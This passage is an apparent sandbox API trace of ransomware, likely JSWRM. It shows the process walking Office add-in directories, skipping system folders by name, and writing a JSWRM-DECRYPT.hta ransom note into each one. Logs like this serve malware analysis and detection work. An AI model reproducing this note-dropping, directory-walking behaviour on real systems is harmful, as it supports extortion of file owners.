ftCreationTime.dwLowDateTime=0x3ff3834d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ff3834d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ff3834d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.974] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0122.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0122.974] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Microsoft Power Query for Excel Integrated", cAlternateFileName="MICROS~1")) returned 1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2=".") returned 1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="..") returned 1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="...") returned 1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="windows") returned -1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="recovery") returned -1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="perflogs") returned -1 [0122.974] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="documents and settings") returned 1 [0122.975] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="$RECYCLE.BIN") returned 1 [0122.975] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="system volume information") returned -1 [0122.975] lstrcmpiW (lpString1="Microsoft Power Query for Excel Integrated", lpString2="msocache") returned -1 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0122.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0122.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0122.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\jswrm-decrypt.hta")) returned 0xffffffff [0122.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0122.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0122.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0122.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0122.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0122.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0122.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.977] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.977] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0122.978] CloseHandle (hObject=0x238) returned 1 [0122.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0122.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0122.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0122.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0122.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0122.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0122.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0122.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0122.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0122.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\jswrm-decrypt.hta")) returned 0x20 [0122.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0122.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0122.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0122.979] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0122.979] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.979] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.979] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.979] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.979] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x895576a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0122.979] lstrcmpiW (lpString1="bin", lpString2=".") returned 1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="..") returned 1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="...") returned 1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="windows") returned -1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="recovery") returned -1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="perflogs") returned -1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="documents and settings") returned -1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="$RECYCLE.BIN") returned 1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="system volume information") returned -1 [0122.979] lstrcmpiW (lpString1="bin", lpString2="msocache") returned -1 [0122.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0122.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0122.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0122.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0122.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0122.980] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\jswrm-decrypt.hta")) returned 0xffffffff [0122.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0122.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0122.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0122.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0122.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0122.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0122.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0122.981] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.981] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0122.982] CloseHandle (hObject=0x314) returned 1 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0122.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\jswrm-decrypt.hta")) returned 0x20 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0122.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0122.982] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName=".", cAlternateFileName="")) returned 0x232080 [0122.982] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.982] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x895576a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff5e5a6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="..", cAlternateFileName="")) returned 1 [0122.983] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.983] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.983] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ar", cAlternateFileName="")) returned 1 [0122.983] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="...") returned 1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="windows") returned -1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="recovery") returned -1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="perflogs") returned -1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="documents and settings") returned -1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="$RECYCLE.BIN") returned 1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="system volume information") returned -1 [0122.983] lstrcmpiW (lpString1="ar", lpString2="msocache") returned -1 [0122.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0122.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0122.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0122.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0122.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0122.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ar\\jswrm-decrypt.hta")) returned 0xffffffff [0122.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0122.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0122.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0122.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0122.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0122.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ar\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0122.992] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.992] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0122.993] CloseHandle (hObject=0x338) returned 1 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0122.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ar\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ar\\jswrm-decrypt.hta")) returned 0x20 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0122.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0122.993] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ar\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff847df, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0122.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.993] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff847df, 